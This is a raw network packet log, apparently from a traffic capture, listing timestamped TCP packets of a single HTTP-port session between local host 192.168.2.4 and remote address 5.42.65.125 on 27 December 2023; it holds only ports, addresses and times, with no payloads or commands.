Dec 27, 2023 17:57:25.133482933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.136233091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.136253119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.136308908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.138217926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.138232946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.138310909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.138549089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.138564110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.138608932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.140481949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.140496969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.140543938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.142688036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.142705917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.142765999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.144241095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.144254923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.144294977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.146030903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.146045923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.146094084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.147687912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.147701979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.147748947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.151407003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.151421070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.151472092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.151624918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.151665926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.151720047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.153436899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.153453112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.153502941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.155787945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.155801058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.155855894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.157109022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.157124043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.157176971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.159003019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.159045935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.159128904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.160793066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.160840034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.160891056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.162595987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.162614107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.162666082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.164431095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.164444923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.164495945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.166363001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.166378021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.166429996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.168056965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.168070078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.168134928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.169615984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.169694901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.169770002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.171574116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.171598911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.171684027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.173373938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.173388958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.173451900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.175115108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.175132990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.175196886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.176584959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.176599026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.176652908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.178524017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.178587914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.178649902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.180170059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.180185080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.180236101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.181744099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.181757927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.181811094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.185048103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.185064077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.185139894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.188122988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.188138008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.188213110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.192560911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.192598104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.192670107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.192955017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.192969084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.193017006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.193770885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.193799019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.193866968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.194901943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.194938898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.195012093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.195504904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.195519924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.195574045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.197021008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.197037935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.197107077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.197176933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.197192907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.197252989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.197999001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.198013067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.198062897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.198909044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.198949099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.199747086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.199763060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.199822903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.200587034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.200601101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.200660944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.201405048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.201446056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.202241898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.202256918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.202302933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.202353001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.203248024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.203260899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.203319073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.203926086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.203942060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.203988075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.204751015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.204776049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.204833984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.205708981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.205744982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.206521034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.206535101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.206579924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.206609964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.207381010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.207393885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.207447052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.208242893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.208257914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.208321095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.209003925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.209019899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.209064960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.209981918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.209997892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.210047960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.210690022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.210750103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.211002111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.211553097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.211596966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.212450981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.212470055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.212518930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.212563992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.213323116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.213337898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.213401079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.214133024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.214148045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.214211941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.214976072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.214993954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.215051889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.215806007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.215821028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.215861082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.216690063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.216705084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.216772079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.217519999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.217535973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.217581987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.218331099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.218369007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.218446970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.219221115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.219279051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.219341040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.220071077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.220091105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.220139980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.220980883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.220999956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.221076965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.221755981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.221770048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.221818924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.222544909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.222580910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.222641945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.223484039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.223499060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.223562956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.224363089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.224379063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.224431992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.225275993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.225292921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.225353003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.225986004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.226000071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.226064920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.226886034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.226901054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.226949930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.227663994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.227678061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.227745056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.228650093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.228663921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.228730917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.229465961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.229480982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.229531050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.230211020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.230261087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.230334044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.231076956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.231118917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.231173992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.231901884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.231945038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.232872963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.232887030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.232925892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.232955933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.233584881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.233598948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.233644009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.234678030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.234698057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.234752893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.235244989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.235301018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.235524893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.236188889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.236206055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.236352921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.236993074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.237008095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.237059116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.237831116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.237848997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.237895966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.238651991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.238670111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.238725901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.239545107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.239599943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.239646912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.240403891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.240421057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.240467072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.241168976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.241211891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.242048025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.242062092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.242106915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.242162943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.242907047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.242930889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.242985964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.243735075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.243748903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.243796110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.244575024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.244587898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.244637012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.245434046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.245446920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.245498896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.246236086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.246249914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.246301889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.247126102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.247138977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.247194052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.247951984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.247966051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.248018980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.248780966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.248810053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.249650955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.249664068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.249707937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.249725103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.250514984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.250529051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.250579119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.251322985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.251337051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.251388073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.252178907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.252192974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.252233982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.253041029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.253078938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.253134966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.253904104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.253920078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.253968954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.254709005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.254765987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.255029917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.255594015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.255609989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.255671024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.256545067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.256558895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.256602049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.257236958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.257262945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.257862091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.258162022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.258177042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.258244038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.258934975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.258950949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.258991957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.262774944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.262792110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.262862921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.263173103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.263200045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.263250113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.263983011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.264084101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.264911890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.264926910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.264966011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.264988899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.265722036 CET	80	49738	5.42.65.125	192.168.2.4
